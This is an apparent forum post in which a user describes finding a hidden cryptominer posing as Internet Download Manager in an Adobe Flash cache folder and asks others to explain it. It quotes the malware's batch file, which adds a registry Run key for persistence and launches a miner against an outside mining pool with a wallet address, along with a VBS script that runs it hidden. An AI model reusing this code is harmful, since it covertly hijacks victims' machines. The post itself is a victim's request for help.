Good Morning All,
My system was really slow one morning. Task manager showed that Internet Download Manager was running even though I never install it. I found it's location in "users/(my account)/appdata/roaming/adobe/flashplayer/purecache". It was taking quite a bit of the CPU.
A search on the net showed that it was probably some kind of malware script that was running. It started itself every time I booted up in the morning through an entry in the registry. I don't know how long I've had it on my system.
The bat file that started it was:
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\PureCache\IDMan.bat\"" /f
start /b /normal "a" "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe" -o stratum+tcp://ns1.eaglecloud.su:9327 -u LZA8F5DgmTCTbdUR1AXpnvuVVFEXbKxcNH -p x
The vbs script file in the same folder as the bat file was:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
I have since removed all of the entries from my system, but am concerned about what may have been happening, as I don't know how long this has been on my system.
Could someone please interpret the bat and script files for me.